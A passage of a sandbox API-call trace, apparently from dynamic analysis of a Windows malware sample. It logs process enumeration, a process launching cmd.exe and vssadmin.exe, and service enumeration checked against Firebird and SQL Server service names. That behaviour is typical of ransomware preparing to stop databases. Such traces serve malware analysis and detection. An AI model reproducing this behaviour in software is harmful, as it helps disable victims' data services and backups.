th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0042.944] lstrlenW (lpString="services.exe") returned 12 [0042.944] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0042.945] lstrlenW (lpString="lsass.exe") returned 9 [0042.945] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0042.946] lstrlenW (lpString="lsm.exe") returned 7 [0042.946] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.946] lstrlenW (lpString="svchost.exe") returned 11 [0042.946] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.947] lstrlenW (lpString="svchost.exe") returned 11 [0042.947] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.948] lstrlenW (lpString="svchost.exe") returned 11 [0042.948] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.949] lstrlenW (lpString="svchost.exe") returned 11 [0042.949] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.949] lstrlenW (lpString="svchost.exe") returned 11 [0042.949] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0042.950] lstrlenW (lpString="audiodg.exe") returned 11 [0042.950] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.951] lstrlenW (lpString="svchost.exe") returned 11 [0042.951] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.952] lstrlenW (lpString="svchost.exe") returned 11 [0042.952] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0042.952] lstrlenW (lpString="dwm.exe") returned 7 [0042.952] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0042.953] lstrlenW (lpString="explorer.exe") returned 12 [0042.953] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0042.954] lstrlenW (lpString="spoolsv.exe") returned 11 [0042.954] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.955] lstrlenW (lpString="taskhost.exe") returned 12 [0042.955] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.955] lstrlenW (lpString="svchost.exe") returned 11 [0042.955] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0042.956] lstrlenW (lpString="taskeng.exe") returned 11 [0042.956] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.957] lstrlenW (lpString="taskhost.exe") returned 12 [0042.957] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0042.958] lstrlenW (lpString="called.exe") returned 10 [0042.958] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0042.958] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0042.958] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0042.959] lstrlenW (lpString="analyst.exe") returned 11 [0042.959] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0042.960] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0042.960] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0042.961] lstrlenW (lpString="wages.exe") returned 9 [0042.961] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0042.961] lstrlenW (lpString="rand.exe") returned 8 [0042.961] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0042.962] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0042.962] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0042.963] lstrlenW (lpString="cottage.exe") returned 11 [0042.963] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0042.963] lstrlenW (lpString="pairs_spec.exe") returned 14 [0042.964] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0042.964] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0042.964] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0042.965] lstrlenW (lpString="observationshairy.exe") returned 21 [0042.965] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0042.966] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0042.966] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0042.966] lstrlenW (lpString="spectrum.exe") returned 12 [0042.966] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0042.967] lstrlenW (lpString="dies.exe") returned 8 [0042.967] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0042.968] lstrlenW (lpString="configured.exe") returned 14 [0042.968] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0042.969] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0042.969] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0042.969] lstrlenW (lpString="fast.exe") returned 8 [0042.969] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0043.207] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0043.209] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0043.226] lstrlenW (lpString="review.exe") returned 10 [0043.226] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0043.226] lstrlenW (lpString="historybinding.exe") returned 18 [0043.226] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0043.227] lstrlenW (lpString="pk task surge.exe") returned 17 [0043.227] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.228] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.228] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0043.229] lstrlenW (lpString="mobsync.exe") returned 11 [0043.229] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0043.229] lstrlenW (lpString="ivttvf.exe") returned 10 [0043.229] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.230] lstrlenW (lpString="cmd.exe") returned 7 [0043.230] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.231] lstrlenW (lpString="conhost.exe") returned 11 [0043.231] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.231] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.231] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.232] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.232] Process32NextW (in: hSnapshot=0x17c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0043.233] CloseHandle (hObject=0x17c) returned 1 [0043.233] Sleep (dwMilliseconds=0x1f4) [0043.826] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5ef9b8 [0043.847] EnumServicesStatusExW (in: hSCManager=0x5ef9b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0043.851] GetLastError () returned 0xea [0043.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3fc24e0 [0043.851] EnumServicesStatusExW (in: hSCManager=0x5ef9b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3fc24e0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3fc24e0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0043.855] CloseServiceHandle (hSCObject=0x5ef9b8) returned 1 [0043.859] lstrlenW (lpString="Appinfo") returned 7 [0043.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0043.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0043.859] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0043.859] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0043.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0043.859] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0043.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.859] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0043.859] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0043.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0043.859] lstrlenW (lpString="AudioSrv") returned 8 [0043.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0043.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0043.859] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0043.859] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0043.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0043.859] lstrlenW (lpString="BFE") returned 3 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0043.860] lstrlenW (lpString="CryptSvc") returned 8 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0043.860] lstrlenW (lpString="CscService") returned 10 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0043.860] lstrlenW (lpString="DcomLaunch") returned 10 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0043.860] lstrlenW (lpString="Dhcp") returned 4 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0043.860] lstrlenW (lpString="Dnscache") returned 8 [0043.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0043.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0043.860] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0043.860] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0043.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0043.861] lstrlenW (lpString="DPS") returned 3 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0043.861] lstrlenW (lpString="eventlog") returned 8 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0043.861] lstrlenW (lpString="EventSystem") returned 11 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0043.861] lstrlenW (lpString="gpsvc") returned 5 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0043.861] lstrlenW (lpString="iphlpsvc") returned 8 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0043.861] lstrlenW (lpString="LanmanServer") returned 12 [0043.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0043.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0043.861] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0043.861] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0043.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0043.862] lstrlenW (lpString="LanmanWorkstation") returned 17 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0043.862] lstrlenW (lpString="lmhosts") returned 7 [0043.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0043.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0043.862] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0043.862] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0043.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0043.862] lstrlenW 